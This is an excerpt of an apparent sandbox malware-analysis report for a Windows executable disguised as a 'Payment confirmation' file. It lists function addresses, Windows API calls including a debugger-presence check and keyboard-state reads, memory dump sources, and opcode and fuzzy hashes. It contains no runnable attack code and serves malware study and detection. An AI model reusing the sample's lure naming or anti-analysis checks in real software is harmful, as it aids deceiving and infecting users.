                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: 133b38695466df121deeaeea8cbe640b9a56e9704eac05184d143640a7114888
                                          • Instruction ID: 9050d06a785afb9ad6269c0566a91fa0a00088a0e193ace9aa02f337ab1e689f
                                          • Opcode Fuzzy Hash: 133b38695466df121deeaeea8cbe640b9a56e9704eac05184d143640a7114888
                                          • Instruction Fuzzy Hash: B531A2B2620607AFD714CF2DC8D5E29F7E8FF583207948229E519CB291DB70E865CB90
                                          Function 012E3682 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                          Download Yara Rule
                                          APIs
                                          • IsThemeActive.UXTHEME ref: 012E36E6
                                            • Part of subcall function 01302025: __lock.LIBCMT ref: 0130202B
                                            • Part of subcall function 012E32DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 012E32F6
                                            • Part of subcall function 012E32DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 012E330B
                                            • Part of subcall function 012E374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 012E376D
                                            • Part of subcall function 012E374E: IsDebuggerPresent.KERNEL32(?,?), ref: 012E377F
                                            • Part of subcall function 012E374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Payment confirmation 20240911.exe,00000104,?,013A1120,C:\Users\user\Desktop\Payment confirmation 20240911.exe,013A1124,?,?), ref: 012E37EE
                                            • Part of subcall function 012E374E: SetCurrentDirectoryW.KERNEL32(?), ref: 012E3860
                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002,?), ref: 012E3726
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                          • String ID:
                                          • API String ID: 924797094-0
                                          • Opcode ID: d48e7e7f92d23b1e668338e1d0799503389901face0ac29bec59f6ebbcdcef1c
                                          • Instruction ID: 925dd40dc45454d09cae0edde39ffaf199abeb25d60341da04c1f587a9029596
                                          • Opcode Fuzzy Hash: d48e7e7f92d23b1e668338e1d0799503389901face0ac29bec59f6ebbcdcef1c
                                          • Instruction Fuzzy Hash: 7E11CD71A18346DBC324DF29E80891BFBE8FB95754F40491EF485832A4DB709904CB92
                                          Function 0130F782 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • ___lock_fhandle.LIBCMT ref: 0130F7D9
                                          • __close_nolock.LIBCMT ref: 0130F7F2
                                            • Part of subcall function 0130886A: __getptd_noexit.LIBCMT ref: 0130886A
                                            • Part of subcall function 0130889E: __getptd_noexit.LIBCMT ref: 0130889E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                          • String ID:
                                          • API String ID: 1046115767-0
                                          • Opcode ID: 4d7970ad0e993e1bddcc0b0f56f2b54528f831c7d704e8ccfc732c6bc9d15893
                                          • Instruction ID: e12cc00eb96a624dbcc4829466be7880bcc00508367fa3c771734586cf6b605e
                                          • Opcode Fuzzy Hash: 4d7970ad0e993e1bddcc0b0f56f2b54528f831c7d704e8ccfc732c6bc9d15893
                                          • Instruction Fuzzy Hash: F911A072C01A258FD727BF6CE8603987EE85F9133DF590280C5605B1E1CBB4AA4187A1
                                          Function 0130010A Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 013045EC: __FF_MSGBANNER.LIBCMT ref: 01304603
                                            • Part of subcall function 013045EC: __NMSG_WRITE.LIBCMT ref: 0130460A
                                            • Part of subcall function 013045EC: RtlAllocateHeap.NTDLL(00720000,00000000,00000001,?,?,?,?,01300127,?,012E125D,00000058,?,?), ref: 0130462F
                                          • std::exception::exception.LIBCMT ref: 0130013E
                                          • __CxxThrowException@8.LIBCMT ref: 01300153
                                            • Part of subcall function 01307495: RaiseException.KERNEL32(?,?,012E125D,01396598,?,?,?,01300158,012E125D,01396598,?,00000001), ref: 013074E6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                          • String ID:
                                          • API String ID: 3902256705-0
                                          • Opcode ID: 377979991ffe743c0ab72f8799d3e28b8142286bff4f4d6b2a3fee45c8c44294
                                          • Instruction ID: 2a9c98d20012259dc114570b909c53361adb5031d68dff01cdc7e11f6476d64c
                                          • Opcode Fuzzy Hash: 377979991ffe743c0ab72f8799d3e28b8142286bff4f4d6b2a3fee45c8c44294
                                          • Instruction Fuzzy Hash: F8F0F47920820EA6EB1FAAECD821ADE7BEC9F0438CF004015FA45961C0CB70D68482A4
                                          Function 01304274 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0130889E: __getptd_noexit.LIBCMT ref: 0130889E
                                          • __lock_file.LIBCMT ref: 013042B9
                                            • Part of subcall function 01305A9F: __lock.LIBCMT ref: 01305AC2
                                          • __fclose_nolock.LIBCMT ref: 013042C4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                          • String ID:
                                          • API String ID: 2800547568-0
                                          • Opcode ID: 91fc6d14756c039ee42893dea2a04098843d7d9ca41857c237a4ce565b27a14c
                                          • Instruction ID: 3dc31ffaf3a1b6c8395a47c37109bb40b5a869cc245473794c562a3ec1408984
                                          • Opcode Fuzzy Hash: 91fc6d14756c039ee42893dea2a04098843d7d9ca41857c237a4ce565b27a14c
                                          • Instruction Fuzzy Hash: 54F0B431A013069BE713BB7D881076E7BD86F5033CF158209C9649B1C0C7BC97418F51
                                          Function 0135AA5A Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID:
                                          • API String ID: 1473721057-0
                                          • Opcode ID: 5331f3fc913ff93bebf352860c5cfbc3f7053ba1b4b7a55ccf3c39ff561f520b
                                          • Instruction ID: e38722d878e423181e24fe0d3a81196fd88b64439c0d282d2792a7f07aea4672
                                          • Opcode Fuzzy Hash: 5331f3fc913ff93bebf352860c5cfbc3f7053ba1b4b7a55ccf3c39ff561f520b
                                          • Instruction Fuzzy Hash: F2415F74504652CFEB25CF18C444B1AFBE1BF45308F1989ACEA995B362D371E885CF52
                                          Function 012EBD71 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: 10ae6eb7db656e8ced77dbc216e3c70f90f88bbcc1d918ec1d15a19117c12b33
                                          • Instruction ID: 675dcc70aa15f33bf6ba85dfd68aa21cf11557a7001f6365e96b66314ec66b08
                                          • Opcode Fuzzy Hash: 10ae6eb7db656e8ced77dbc216e3c70f90f88bbcc1d918ec1d15a19117c12b33
                                          • Instruction Fuzzy Hash: E1216A71620A09EBDF254F24E846B6EBBF9FF04754F21842DD986D6095EB31C0D0C711
                                          Function 012E3F9B Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012E3F5D: FreeLibrary.KERNEL32(00000000,?), ref: 012E3F90
                                          • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,012E34E2,?,00000001), ref: 012E3FCD
                                            • Part of subcall function 012E3E78: FreeLibrary.KERNEL32(00000000), ref: 012E3EAB
                                            • Part of subcall function 012E4010: _memmove.LIBCMT ref: 012E405A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Library$Free$Load_memmove
                                          • String ID:
                                          • API String ID: 3640140200-0
                                          • Opcode ID: 1cdd99f07cbb14d81cd63de698015ea83565434e87dd08b2469c5b657c84fe2c
                                          • Instruction ID: ee05d083c199557306c0d1dfe589a714a4c8ec153eeea5601ba4bbae8a2eb50a
                                          • Opcode Fuzzy Hash: 1cdd99f07cbb14d81cd63de698015ea83565434e87dd08b2469c5b657c84fe2c
                                          • Instruction Fuzzy Hash: A311A731720216BBCF24FB64DC19FAD7AE5AF60705F508829E541E71C0DB70AA059750
                                          Function 0135AB2A Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID:
                                          • API String ID: 1473721057-0
                                          • Opcode ID: ee0b85fa75516ad0bcd8488b4d1d9ed4c393448d29b20c4699cfa57713fb20c9
                                          • Instruction ID: 7148c254c338b6a44e620c3a35917b109b02e4927df42758ccb41e83df7006ba
                                          • Opcode Fuzzy Hash: ee0b85fa75516ad0bcd8488b4d1d9ed4c393448d29b20c4699cfa57713fb20c9
                                          • Instruction Fuzzy Hash: 26214674118202CFEB29DF68C444B2BBBE2BF88348F04496CFA9657262D331E845CF52
                                          Function 0130BD14 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • ___lock_fhandle.LIBCMT ref: 0130BD73
                                            • Part of subcall function 0130886A: __getptd_noexit.LIBCMT ref: 0130886A
                                            • Part of subcall function 0130889E: __getptd_noexit.LIBCMT ref: 0130889E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: __getptd_noexit$___lock_fhandle
                                          • String ID:
                                          • API String ID: 1144279405-0
                                          • Opcode ID: e68b7f319db32ea33b45ec5d4e1bb26481119bb93a12d47bf4132480a4ef4472
                                          • Instruction ID: 1ebe0802985ffef6f904606a616eab1793600f0994fa2ce87e84bb741fc05302
                                          • Opcode Fuzzy Hash: e68b7f319db32ea33b45ec5d4e1bb26481119bb93a12d47bf4132480a4ef4472
                                          • Instruction Fuzzy Hash: DB11C176C0161A9FD713AF6CE860358FBE16F6133DF090280D5B41F2E9CBB48A008B62
                                          Function 0130373E Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                          Download Yara Rule
                                          APIs
                                          • __lock_file.LIBCMT ref: 0130377D
                                            • Part of subcall function 0130889E: __getptd_noexit.LIBCMT ref: 0130889E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: __getptd_noexit__lock_file
                                          • String ID:
                                          • API String ID: 2597487223-0
                                          • Opcode ID: cce5b12941e49f149918b32f9a2257d05178f1bcb39a43381e9d08ba7256bb73
                                          • Instruction ID: bc5d6ca026eaf79b54f3e3634f27e67787c3afdb8357a69cc2c93076ae559ae6
                                          • Opcode Fuzzy Hash: cce5b12941e49f149918b32f9a2257d05178f1bcb39a43381e9d08ba7256bb73
                                          • Instruction Fuzzy Hash: B7F06D71901206AEEF23AF7D8C1579F7AE0BF10A68F048514E8149A2D0D7B98A50DB91
                                          Function 012E3E39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                          Download Yara Rule
                                          APIs
                                          • FreeLibrary.KERNEL32(?,?,?,?,?,012E34E2,?,00000001), ref: 012E3E6D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: b05acda105e302d2c94f8e9145575ba206ad4b2ba033e849107ce77cc33dbee9
                                          • Instruction ID: b44593c67169e9cfee90c1a7f55a04ec41e77318e3112ac8eff5ed1dfa1333e6
                                          • Opcode Fuzzy Hash: b05acda105e302d2c94f8e9145575ba206ad4b2ba033e849107ce77cc33dbee9
                                          • Instruction Fuzzy Hash: 25F03972121742DFCB35DF68D498813BBF4BF0462A3588A3EE2D683621C7719844CF00
                                          Function 012FF92C Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                          • Instruction ID: 7f38f8afb5791b6db70afd3c6b14bc81a16c30f28029a7eecbf1f8901465bef4
                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                          • Instruction Fuzzy Hash: 13310872A10106ABD708DF5CC681A69FBA1FF49300F2486A9E64ADB255D730EDC1CBD0
                                          Function 002622A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350512103.0000000000260000.00000040.00001000.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_260000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                          • Instruction ID: d5adc70b3c7f7e36dee1bcb08f6ab4e22e94b412ebbc702e7085227c85ce064f
                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                          • Instruction Fuzzy Hash: 56E0E67494010EDFDB00EFB4D94969E7FB4EF04701F100161FD01D2280D6309D608A72

                                          Non-executed Functions

                                          Function 0134F5D0 Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 630windowkeyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 012FAF8E
                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0134F64E
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0134F6AD
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0134F6EA
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0134F711
                                          • SendMessageW.USER32 ref: 0134F737
                                          • _wcsncpy.LIBCMT ref: 0134F7A3
                                          • GetKeyState.USER32(00000011), ref: 0134F7C4
                                          • GetKeyState.USER32(00000009), ref: 0134F7D1
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0134F7E7
                                          • GetKeyState.USER32(00000010), ref: 0134F7F1
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0134F820
                                          • SendMessageW.USER32 ref: 0134F843
                                          • SendMessageW.USER32(?,00001030,?,0134DE69), ref: 0134F940
                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0134F956
                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0134F967
                                          • SetCapture.USER32(?), ref: 0134F970
                                          • ClientToScreen.USER32(?,?), ref: 0134F9D4
                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0134F9E0
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0134F9FA
                                          • ReleaseCapture.USER32(?,?,?,?), ref: 0134FA05
                                          • GetCursorPos.USER32(?), ref: 0134FA3A
                                          • ScreenToClient.USER32(?,?), ref: 0134FA47
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0134FAA9
                                          • SendMessageW.USER32 ref: 0134FAD3
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0134FB12
                                          • SendMessageW.USER32 ref: 0134FB3D
                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0134FB55
                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0134FB60
                                          • GetCursorPos.USER32(?), ref: 0134FB81
                                          • ScreenToClient.USER32(?,?), ref: 0134FB8E
                                          • GetParent.USER32(?), ref: 0134FBAA
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0134FC10
                                          • SendMessageW.USER32 ref: 0134FC40
                                          • ClientToScreen.USER32(?,?), ref: 0134FC96
                                          • TrackPopupMenuEx.USER32 ref: 0134FCC2
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0134FCEA
                                          • SendMessageW.USER32 ref: 0134FD0D
                                          • ClientToScreen.USER32(?,?), ref: 0134FD57
                                          • TrackPopupMenuEx.USER32 ref: 0134FD87
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0134FE1C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                          • String ID: @GUI_DRAGID$F$`"u
                                          • API String ID: 2516578528-3462107663
                                          • Opcode ID: d998c86027b7360fa3d3e3806f03a9a25d4d1f279a8d87b175bf4be86d83bdbe
                                          • Instruction ID: c816c2a67d70362a15586e83d835b3dba1d40ae87aa6867aa5b29aef27258c17
                                          • Opcode Fuzzy Hash: d998c86027b7360fa3d3e3806f03a9a25d4d1f279a8d87b175bf4be86d83bdbe
                                          • Instruction Fuzzy Hash: E132BE74204646AFEB20DF6CC884AAABFEDFF48368F084519F695872A1D734EC54CB51
                                          Function 0134A8DC Relevance: 61.8, APIs: 33, Strings: 2, Instructions: 574windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0134AFDB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: %d/%02d/%02d$`"u
                                          • API String ID: 3850602802-1106926150
                                          • Opcode ID: 47824e55a2a97d735797d331c99fa49a26812149a778caf188cbd8a06822b6fb
                                          • Instruction ID: 2a39e3f4019341897125a6bdf3e8b6ffa22b83cd540d68635ddfc89e194f5905
                                          • Opcode Fuzzy Hash: 47824e55a2a97d735797d331c99fa49a26812149a778caf188cbd8a06822b6fb
                                          • Instruction Fuzzy Hash: 4212B1B1640249ABEB258F69CC48FAE7FF8EF45318F008119F65ADB2D0DB70A945CB51
                                          Function 012FF78E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetForegroundWindow.USER32 ref: 012FF796
                                          • FindWindowW.USER32 ref: 01354388
                                          • IsIconic.USER32(000000FF), ref: 01354391
                                          • ShowWindow.USER32(000000FF,00000009), ref: 0135439E
                                          • SetForegroundWindow.USER32(000000FF), ref: 013543A8
                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 013543BE
                                          • GetCurrentThreadId.KERNEL32 ref: 013543C5
                                          • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 013543D1
                                          • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 013543E2
                                          • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 013543EA
